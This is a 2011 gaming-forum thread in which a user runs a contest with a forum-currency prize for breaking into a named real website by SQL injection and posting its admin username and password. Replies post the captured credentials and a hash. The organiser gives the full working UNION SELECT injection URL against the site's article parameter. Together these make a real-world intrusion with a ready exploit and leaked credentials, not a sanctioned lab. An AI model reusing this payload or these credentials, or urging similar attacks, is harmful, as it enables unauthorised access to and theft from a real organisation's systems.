Post: SQL injection contest - 50k vBux reward - FREE ENTRY
Options
12-18-2011, 12:42 AM
#1
tokzikate
Gym leader
Sql Injection Competition
Okay so this is a contest, to see who can get the admin username and password first.
The winner will recieve a 50k vBux reward!
It is free to enter!
Once you receive the admin username and password, post here, the first person to post the correct details will win the prize!
The site is: https://nopalindonesia.com/
some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues
{}{}{} GO {}{}{}
un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read You must login or register to view this content. tut on SQL injection.
Last edited by
tokzikate ; 12-18-2011 at 01:01 AM.
12-18-2011, 06:24 AM
#2
Cade
Guest
Originally posted by tokzikate
Test out your SQL injecting skills
Sql Injection Competition
Okay so this is a contest, to see who can get the admin username and password first.
The winner will recieve a 50k vBux reward!
It is free to enter!
Once you receive the admin username and password, post here, the first person to post the correct details will win the prize!
The site is: https://nopalindonesia.com/
some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues
{}{}{} GO {}{}{}
un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read You must login or register to view this content. tut on SQL injection.
Sql Injection Competition
Okay so this is a contest, to see who can get the admin username and password first.
The winner will recieve a 50k vBux reward!
It is free to enter!
Once you receive the admin username and password, post here, the first person to post the correct details will win the prize!
The site is: https://nopalindonesia.com/
some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues
{}{}{} GO {}{}{}
un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read You must login or register to view this content. tut on SQL injection.
user:admin
pass:admin
:dumb::dumb:
12-18-2011, 06:29 AM
#3
Snow Samurai
Climbing up the ladder
12-18-2011, 06:33 AM
#4
Koltz
Banned
Originally posted by tokzikate
Test out your SQL injecting skills
Sql Injection Competition
Okay so this is a contest, to see who can get the admin username and password first.
The winner will recieve a 50k vBux reward!
It is free to enter!
Once you receive the admin username and password, post here, the first person to post the correct details will win the prize!
The site is: https://nopalindonesia.com/
some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues
{}{}{} GO {}{}{}
un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read You must login or register to view this content. tut on SQL injection.
Sql Injection Competition
Okay so this is a contest, to see who can get the admin username and password first.
The winner will recieve a 50k vBux reward!
It is free to enter!
Once you receive the admin username and password, post here, the first person to post the correct details will win the prize!
The site is: https://nopalindonesia.com/
some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues
{}{}{} GO {}{}{}
un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read You must login or register to view this content. tut on SQL injection.
lol it admin
admin :carling:
EDIT: DAMN! BEATIN TO THE ANWSER
kay:
12-18-2011, 06:49 AM
#7
tokzikate
Gym leader
i dont know but here is the final URL injection:
then all you had to do was decrypt the weak MD5 hash to get the password "admin"
https://www.nopalindonesia.com/view.php?idArtikel=-12+UNION+SELECT+1,2,group_concat(username, 0x3a,password),4,5,6,7 from user
then all you had to do was decrypt the weak MD5 hash to get the password "admin"
Originally posted by Snow
yo lol wtf did i do wrong i got $1$dg/.iu1.$sBvhmZWxa.LDyDp7wmC9t/
12-18-2011, 06:52 AM
#8
Snow Samurai
Climbing up the ladder
Originally posted by tokzikate
i dont know but here is the final URL injection:
then all you had to do was decrypt the weak MD5 hash to get the password "admin"
https://www.nopalindonesia.com/view.php?idArtikel=-12+UNION+SELECT+1,2,group_concat(username, 0x3a,password),4,5,6,7 from user
then all you had to do was decrypt the weak MD5 hash to get the password "admin"
/facepalm i got that too /facepalm /facepalm im an idiot
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
